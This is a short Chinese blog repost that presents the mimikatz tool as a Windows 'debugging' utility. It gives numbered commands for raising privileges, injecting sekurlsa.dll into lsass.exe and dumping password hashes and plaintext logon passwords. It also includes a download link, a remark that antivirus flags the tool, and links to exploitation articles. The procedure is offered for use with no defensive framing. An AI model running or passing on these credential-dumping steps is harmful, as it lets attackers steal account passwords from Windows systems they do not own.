城市里的游牧民族

Menu

转:windows下轻量级调试神器—mimikatz

最近网上有一个很火的的工具:mimikatz被誉为:windows下轻量级调试神器
我到我测试后是没有成功,但是又网友测试成功。
收获是发现了一个外国人的博客:官网:http://blog.gentilkiwi.com/mimikatz
有时间翻译着看看吧!是有好处的!
-----------------------------

mimikatz是一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限 注入进程 读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器,其强大的功能还有待挖掘。

使用方法:
1. 运行主程序:mimikatz.exe
2. 输入:privilege::debug      提升权限
3. 输入:inject::process lsass.exe sekurlsa.dll   
     将sekurlsa.dll  注入到lsass.exe 中
4. 输入:@getLogonPasswords
   即可获取hash和当前用户的明文密码!

注:该工具,杀软会报毒。

下载地址:http://115.com/file/e7lk679q#mimikatz_trunk.zip

官网:http://blog.gentilkiwi.com/mimikatz

相关利用文章:
http://hi.baidu.com/hackercasper ... b6a5cc562c8461.html
http://hi.baidu.com/%CE%E9%D7%D3 ... e5c73006088be7.html

— 于 共写了714个字
— 文内使用到的标签:
本作品采用知识共享署名-非商业性使用-禁止演绎 3.0 中国大陆许可协议进行许可。

评论已关闭。